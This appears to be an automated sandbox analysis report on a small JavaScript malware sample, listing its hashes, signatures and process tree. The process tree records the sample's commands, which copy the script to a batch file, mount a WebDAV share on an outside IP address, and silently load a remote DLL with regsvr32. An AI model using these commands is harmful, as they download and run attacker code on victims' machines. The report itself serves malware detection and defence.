Analysis
-
max time kernel
13s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 05:58
Static task
static1
Behavioral task
behavioral1
Sample
2035815001653724469.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2035815001653724469.js
Resource
win10v2004-20240704-en
General
-
Target
2035815001653724469.js
-
Size
5KB
-
MD5
770f45a1e4733444a42eb7d7d3a87981
-
SHA1
b6dc3b63d358eb911494ec3a6899ec1a34ca3a64
-
SHA256
79f047e7fe22c18d409498ea601c2dac3022d58e8539636d36b94f70e1a82ec7
-
SHA512
dcc59b0944f1117efdc1510fa36e71e039532a143276a69673b36a2c4724aa1408d754bbd64ac4bcff85a1807e808e4c4f1f683c00e8667e42855b0569984ec3
-
SSDEEP
96:O4CeNKhGUpMeEpMkjozmDpZPqY/6mlhsmlA2pmlh1QMOm5k2MOmE:ZKFW7hwCRmPBkHc
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 388 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2556 wrote to memory of 2440 2556 wscript.exe 29 PID 2556 wrote to memory of 2440 2556 wscript.exe 29 PID 2556 wrote to memory of 2440 2556 wscript.exe 29 PID 2440 wrote to memory of 2680 2440 cmd.exe 31 PID 2440 wrote to memory of 2680 2440 cmd.exe 31 PID 2440 wrote to memory of 2680 2440 cmd.exe 31 PID 2440 wrote to memory of 388 2440 cmd.exe 32 PID 2440 wrote to memory of 388 2440 cmd.exe 32 PID 2440 wrote to memory of 388 2440 cmd.exe 32 PID 2440 wrote to memory of 388 2440 cmd.exe 32 PID 2440 wrote to memory of 388 2440 cmd.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js1⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js" "C:\Users\Admin\\wqhjmm.bat" && "C:\Users\Admin\\wqhjmm.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2680
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\701.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:388
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5770f45a1e4733444a42eb7d7d3a87981
SHA1b6dc3b63d358eb911494ec3a6899ec1a34ca3a64
SHA25679f047e7fe22c18d409498ea601c2dac3022d58e8539636d36b94f70e1a82ec7
SHA512dcc59b0944f1117efdc1510fa36e71e039532a143276a69673b36a2c4724aa1408d754bbd64ac4bcff85a1807e808e4c4f1f683c00e8667e42855b0569984ec3